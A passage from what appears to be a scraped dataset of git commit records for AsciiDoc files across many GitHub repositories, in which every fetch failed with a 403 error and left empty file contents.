i,InspurUSA\/nifi,dlukyanov\/nifi,ijokarumawak\/nifi,patricker\/nifi,WilliamNouet\/ApacheNiFi,WilliamNouet\/ApacheNiFi,tequalsme\/nifi,zhengsg\/nifi,Xsixteen\/nifi,YolandaMDavis\/nifi,Wesley-Lawrence\/nifi,bbende\/nifi,thesolson\/nifi,qfdk\/nifi,mattyb149\/nifi,tijoparacka\/nifi,YolandaMDavis\/nifi,trixpan\/nifi,WilliamNouet\/nifi,Xsixteen\/nifi,patricker\/nifi,mattyb149\/nifi,joetrite\/nifi,mattyb149\/nifi","old_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YolandaMDavis\/nifi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42f093a0e3a8939c0937c75f63861b988551ee9b","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ed1b7bffdd73cbdc01543d15d4622c4df012e43","subject":"Deleted _posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","message":"Deleted _posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-Les-causes-de-letat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4146eeaf9795e5cceb0521717a7a56f0b3d73508","subject":"Update 2016-11-28-An-Introduction-of-Finagle-by-example.adoc","message":"Update 2016-11-28-An-Introduction-of-Finagle-by-example.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-28-An-Introduction-of-Finagle-by-example.adoc","new_file":"_posts\/2016-11-28-An-Introduction-of-Finagle-by-example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83e97655cc34ef848e8cc352af157396dec807da","subject":"CAMEL-10447 Added Transformer adoc","message":"CAMEL-10447 Added Transformer 
adoc\n","repos":"dmvolod\/camel,nboukhed\/camel,alvinkwekel\/camel,christophd\/camel,gnodet\/camel,anton-k11\/camel,pkletsko\/camel,mgyongyosi\/camel,anoordover\/camel,objectiser\/camel,isavin\/camel,acartapanis\/camel,mgyongyosi\/camel,apache\/camel,jkorab\/camel,nikhilvibhav\/camel,anton-k11\/camel,zregvart\/camel,CodeSmell\/camel,yuruki\/camel,jonmcewen\/camel,dmvolod\/camel,drsquidop\/camel,pkletsko\/camel,bhaveshdt\/camel,lburgazzoli\/camel,ssharma\/camel,allancth\/camel,tadayosi\/camel,chirino\/camel,lburgazzoli\/camel,bgaudaen\/camel,sverkera\/camel,kevinearls\/camel,objectiser\/camel,veithen\/camel,gilfernandes\/camel,rmarting\/camel,nboukhed\/camel,gilfernandes\/camel,jonmcewen\/camel,pkletsko\/camel,driseley\/camel,Fabryprog\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,tlehoux\/camel,rmarting\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,adessaigne\/camel,cunningt\/camel,scranton\/camel,adessaigne\/camel,anton-k11\/camel,CodeSmell\/camel,ssharma\/camel,tlehoux\/camel,w4tson\/camel,kevinearls\/camel,hqstevenson\/camel,cunningt\/camel,isavin\/camel,hqstevenson\/camel,nboukhed\/camel,ullgren\/camel,onders86\/camel,veithen\/camel,tadayosi\/camel,dmvolod\/camel,mgyongyosi\/camel,kevinearls\/camel,DariusX\/camel,mgyongyosi\/camel,Thopap\/camel,cunningt\/camel,gilfernandes\/camel,pax95\/camel,gautric\/camel,lburgazzoli\/camel,mgyongyosi\/camel,yuruki\/camel,NickCis\/camel,sverkera\/camel,lburgazzoli\/apache-camel,onders86\/camel,sverkera\/camel,sabre1041\/camel,driseley\/camel,sirlatrom\/camel,akhettar\/camel,hqstevenson\/camel,adessaigne\/camel,gautric\/camel,alvinkwekel\/camel,prashant2402\/camel,onders86\/camel,Thopap\/camel,driseley\/camel,zregvart\/camel,tkopczynski\/camel,jkorab\/camel,anoordover\/camel,cunningt\/camel,DariusX\/camel,gautric\/camel,zregvart\/camel,allancth\/camel,rmarting\/camel,prashant2402\/camel,jonmcewen\/camel,tlehoux\/camel,christophd\/camel,hqstevenson\/camel,acartapanis\/camel,bgaudaen\/camel,objectiser\/camel,sabre1041\/camel,pax95\/camel,pkletsko\/camel,jonmcewen\/camel,jamesnetherton\/camel,sirlatrom\/camel,tdiesler\/camel,gautric\/camel,tkopczynski\/camel,prashant2402\/camel,isavin\/camel,tdiesler\/camel,allancth\/camel,scranton\/camel,apache\/camel,kevinearls\/camel,punkhorn\/camel-upstream,drsquidop\/camel,tkopczynski\/camel,curso007\/camel,gilfernandes\/camel,adessaigne\/camel,w4tson\/camel,rmarting\/camel,ullgren\/camel,Thopap\/camel,chirino\/camel,prashant2402\/camel,bgaudaen\/camel,lburgazzoli\/apache-camel,gautric\/camel,drsquidop\/camel,punkhorn\/camel-upstream,isavin\/camel,tlehoux\/camel,lburgazzoli\/apache-camel,veithen\/camel,scranton\/camel,akhettar\/camel,davidkarlsen\/camel,RohanHart\/camel,mcollovati\/camel,pmoerenhout\/camel,sverkera\/camel,jonmcewen\/camel,yuruki\/camel,salikjan\/camel,jonmcewen\/camel,ullgren\/camel,tdiesler\/camel,kevinearls\/camel,Thopap\/camel,zregvart\/camel,yuruki\/camel,dmvolod\/camel,chirino\/camel,tdiesler\/camel,sabre1041\/camel,jamesnetherton\/camel,w4tson\/camel,christophd\/camel,acartapanis\/camel,nicolaferraro\/camel,chirino\/camel,davidkarlsen\/camel,driseley\/camel,driseley\/camel,sabre1041\/camel,RohanHart\/camel,tadayosi\/camel,scranton\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,snurmine\/camel,DariusX\/camel,Fabryprog\/camel,jkorab\/camel,bhaveshdt\/camel,sirlatrom\/camel,pax95\/camel,prashant2402\/camel,NickCis\/camel,mcollovati\/camel,isavin\/camel,ullgren\/camel,dmvolod\/camel,sverkera\/camel,gnodet\/camel,RohanHart\/camel,chirino\/camel,akhettar\/camel,tdiesler\/camel,rmarting\/camel
,cunningt\/camel,lburgazzoli\/camel,nicolaferraro\/camel,tlehoux\/camel,bgaudaen\/camel,scranton\/camel,jamesnetherton\/camel,mgyongyosi\/camel,dmvolod\/camel,mcollovati\/camel,adessaigne\/camel,NickCis\/camel,hqstevenson\/camel,yuruki\/camel,bgaudaen\/camel,driseley\/camel,anoordover\/camel,Thopap\/camel,alvinkwekel\/camel,snurmine\/camel,CodeSmell\/camel,snurmine\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,isavin\/camel,christophd\/camel,onders86\/camel,nikhilvibhav\/camel,curso007\/camel,snurmine\/camel,onders86\/camel,alvinkwekel\/camel,anoordover\/camel,pmoerenhout\/camel,veithen\/camel,DariusX\/camel,pax95\/camel,bhaveshdt\/camel,gilfernandes\/camel,w4tson\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,NickCis\/camel,kevinearls\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,w4tson\/camel,tadayosi\/camel,curso007\/camel,christophd\/camel,acartapanis\/camel,allancth\/camel,lburgazzoli\/camel,sabre1041\/camel,davidkarlsen\/camel,tkopczynski\/camel,curso007\/camel,anton-k11\/camel,nboukhed\/camel,tkopczynski\/camel,RohanHart\/camel,hqstevenson\/camel,tlehoux\/camel,nicolaferraro\/camel,drsquidop\/camel,ssharma\/camel,bhaveshdt\/camel,allancth\/camel,drsquidop\/camel,veithen\/camel,allancth\/camel,sirlatrom\/camel,drsquidop\/camel,chirino\/camel,scranton\/camel,gnodet\/camel,pax95\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,ssharma\/camel,akhettar\/camel,tadayosi\/camel,salikjan\/camel,akhettar\/camel,CodeSmell\/camel,Thopap\/camel,ssharma\/camel,pkletsko\/camel,curso007\/camel,adessaigne\/camel,jamesnetherton\/camel,curso007\/camel,christophd\/camel,jkorab\/camel,nboukhed\/camel,anoordover\/camel,jkorab\/camel,anton-k11\/camel,RohanHart\/camel,gautric\/camel,anton-k11\/camel,tdiesler\/camel,apache\/camel,bhaveshdt\/camel,Fabryprog\/camel,sirlatrom\/camel,ssharma\/camel,apache\/camel,objectiser\/camel,bhaveshdt\/camel,NickCis\/camel,snurmine\/camel,gnodet\/camel,bgaudaen\/camel,pkletsko\/camel,snurmine\/camel,apache\/camel,acartapanis\/camel,akhettar\/camel,veithen\/camel,sirlatrom\/camel,rmarting\/camel,pax95\/camel,NickCis\/camel,yuruki\/camel,nikhilvibhav\/camel,sverkera\/camel,cunningt\/camel,gilfernandes\/camel,anoordover\/camel,tadayosi\/camel,w4tson\/camel,pmoerenhout\/camel,onders86\/camel,jamesnetherton\/camel,apache\/camel,pmoerenhout\/camel,acartapanis\/camel,prashant2402\/camel,Fabryprog\/camel,gnodet\/camel,sabre1041\/camel,jkorab\/camel","old_file":"camel-core\/src\/main\/docs\/transformer.adoc","new_file":"camel-core\/src\/main\/docs\/transformer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a69940b77b91533cbe895a6e4414a73099e8d0b9","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/post_modernism.adoc","new_file":"content\/writings\/post_modernism.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e64e5568ca1a754052f4a6c4f92aa0ebb7da6651","subject":"hello web","message":"hello 
web\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"web.adoc","new_file":"web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb8708603b36bd2b0e6d3e9d95bc18de5e42ae9e","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61794e1bafc8fc7b02b24d923247f3a787f49ba2","subject":"Deleted _posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Deleted _posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c549df40685ddd072eb599f3b1823f93dff04db","subject":"Eclipse 2021-12","message":"Eclipse 2021-12\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6ccc367043728c6e21dbd3e2281c8b01f52e27a","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98c9eca18b844735225008b12b358a099661428a","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4478d4a9622907af4fea0052bd6c5bcf966c5dd8","subject":"y2b create post THE MOST INSANE SETUP EVER - #LGOLEDTV","message":"y2b create post THE MOST INSANE SETUP EVER - #LGOLEDTV","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-23-THE-MOST-INSANE-SETUP-EVER--LGOLEDTV.adoc","new_file":"_posts\/2016-07-23-THE-MOST-INSANE-SETUP-EVER--LGOLEDTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42fe3d61dfeb6156f73daa5e9753b52dfe36f20c","subject":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","message":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f221e52e700ca3a971b6c226ffc7d03d642aee85","subject":"Updates book-using-jison-beyond-the-basics\/3_Diving_Into_JISON.adoc","message":"Updates book-using-jison-beyond-the-basics\/3_Diving_Into_JISON.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/3_Diving_Into_JISON.adoc","new_file":"book-using-jison-beyond-the-basics\/3_Diving_Into_JISON.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"867d468aabca79f4dbd111a2d734dd4f6fe02774","subject":"Create plugin_development.adoc","message":"Create plugin_development.adoc\n\nInitial version","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plugin_development.adoc","new_file":"userguide\/tutorials\/plugin_development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"078d1bdbdb540df39969a534dd064ea1171a320a","subject":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","message":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de3657027a1e9c439a286bed157786d77d8c7acf","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 
2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d40c402de5379e8170e27723f926f8826007251","subject":"Update 2018-08-12-Why-do-I-think-Stringhash-Code-is-poor.adoc","message":"Update 2018-08-12-Why-do-I-think-Stringhash-Code-is-poor.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-12-Why-do-I-think-Stringhash-Code-is-poor.adoc","new_file":"_posts\/2018-08-12-Why-do-I-think-Stringhash-Code-is-poor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a860f7a89274efc255f86ab06cbe97535b15f25","subject":"Update 2016-05-31-Ditirambo-contado-por-sus-cantantes-I.adoc","message":"Update 2016-05-31-Ditirambo-contado-por-sus-cantantes-I.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-05-31-Ditirambo-contado-por-sus-cantantes-I.adoc","new_file":"_posts\/2016-05-31-Ditirambo-contado-por-sus-cantantes-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c29c1f2beaed24721b7c38aaa06b8767716bc44b","subject":"More XML syntax","message":"More XML syntax\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53bce8175f1d6a14d3ffb59928a379ec571451c7","subject":"Update 2019-02-10-RTFM-Episode-0x01.adoc","message":"Update 2019-02-10-RTFM-Episode-0x01.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93ef9ddd5783e547dd61e07e9e91bb6eb38862e3","subject":"Add missing ascii doc file","message":"Add missing ascii doc file\n","repos":"lbodor\/geodesy-domain-model,lbodor\/geodesy-domain-model","old_file":"src\/site\/asciidoc\/rest-upload-sopac-sitelog.adoc","new_file":"src\/site\/asciidoc\/rest-upload-sopac-sitelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lbodor\/geodesy-domain-model.git\/': 
The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"78ced7b9e3d5d668ab6965d1d3d14be7701a2eab","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29bdd8a51ebb3d92c571919704a1dd79e61fb01e","subject":"Update 2015-06-06-A-Remplacer.adoc","message":"Update 2015-06-06-A-Remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-A-Remplacer.adoc","new_file":"_posts\/2015-06-06-A-Remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f93d7363e312a980b9100b4e4d5ab83f969951dd","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee0f12da498140594afc05faec0ec35af83b55d4","subject":"Update 2017-02-16-Google-Home.adoc","message":"Update 2017-02-16-Google-Home.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-16-Google-Home.adoc","new_file":"_posts\/2017-02-16-Google-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae73979e4bfbbf114b6675c63b38955d912cda7e","subject":"[DOCS] clarify command to run REST tests only","message":"[DOCS] clarify command to run REST tests only\n\nRest tests are now part of the verify goal, thus if we only want to execute those we need to skip unit tests, otherwise we'll get an error saying that the test phase completed without running any 
tests.","repos":"sreeramjayan\/elasticsearch,polyfractal\/elasticsearch,henakamaMSFT\/elasticsearch,ivansun1010\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,F0lha\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,C-Bish\/elasticsearch,camilojd\/elasticsearch,IanvsPoplicola\/elasticsearch,JervyShi\/elasticsearch,HonzaKral\/elasticsearch,mmaracic\/elasticsearch,umeshdangat\/elasticsearch,kaneshin\/elasticsearch,Helen-Zhao\/elasticsearch,sreeramjayan\/elasticsearch,jbertouch\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,myelin\/elasticsearch,MaineC\/elasticsearch,njlawton\/elasticsearch,diendt\/elasticsearch,jchampion\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,awislowski\/elasticsearch,artnowo\/elasticsearch,jpountz\/elasticsearch,pozhidaevak\/elasticsearch,palecur\/elasticsearch,jbertouch\/elasticsearch,LeoYao\/elasticsearch,davidvgalbraith\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,PhaedrusTheGreek\/elasticsearch,snikch\/elasticsearch,schonfeld\/elasticsearch,F0lha\/elasticsearch,xuzha\/elasticsearch,rhoml\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,markharwood\/elasticsearch,fernandozhu\/elasticsearch,markharwood\/elasticsearch,mortonsykes\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,tebriel\/elasticsearch,a2lin\/elasticsearch,avikurapati\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,diendt\/elasticsearch,tebriel\/elasticsearch,liweinan0423\/elasticsearch,GlenRSmith\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,GlenRSmith\/elasticsearch,spiegela\/elasticsearch,njlawton\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ESamir\/elasticsearch,glefloch\/elasticsearch,elasticdog\/elasticsearch,girirajsharma\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,C-Bish\/elasticsearch,clintongormley\/elasticsearch,AndreKR\/elasticsearch,davidvgalbraith\/elasticsearch,LeoYao\/elasticsearch,yynil\/elasticsearch,mohit\/elasticsearch,cwurm\/elasticsearch,clintongormley\/elasticsearch,clintongormley\/elasticsearch,ricardocerq\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,AndreKR\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,strapdata\/elassandra5-rc,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,GlenRSmith\/elasticsearch,jchampion\/elasticsearch,mikemccand\/elasticsearch,F0lha\/elasticsearch,nomoa\/elasticsearch,mortonsykes\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,yanjunh\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,wbowling\/elasticsearch,xuzha\/elasticsearch,tebriel\/elasticsearch,wangtuo\/elasticsearch,MisterAndersen\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,snikch\/elasticsearch,dongjoon-hyun\/elasticsearch,nilabhsagar\/elasticsearch,JervyShi\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,kaneshin\/elasticsearch,avikurapati\/elasticsearch,nknize\/elasticsearch,ZTE-PaaS\/elasticsearch,AndreKR\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasti
csearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,yanjunh\/elasticsearch,yanjunh\/elasticsearch,andrejserafim\/elasticsearch,liweinan0423\/elasticsearch,i-am-Nathan\/elasticsearch,mapr\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,fernandozhu\/elasticsearch,camilojd\/elasticsearch,jbertouch\/elasticsearch,schonfeld\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,sreeramjayan\/elasticsearch,F0lha\/elasticsearch,dongjoon-hyun\/elasticsearch,jprante\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,pozhidaevak\/elasticsearch,girirajsharma\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,drewr\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,fforbeck\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,awislowski\/elasticsearch,JervyShi\/elasticsearch,mapr\/elasticsearch,fernandozhu\/elast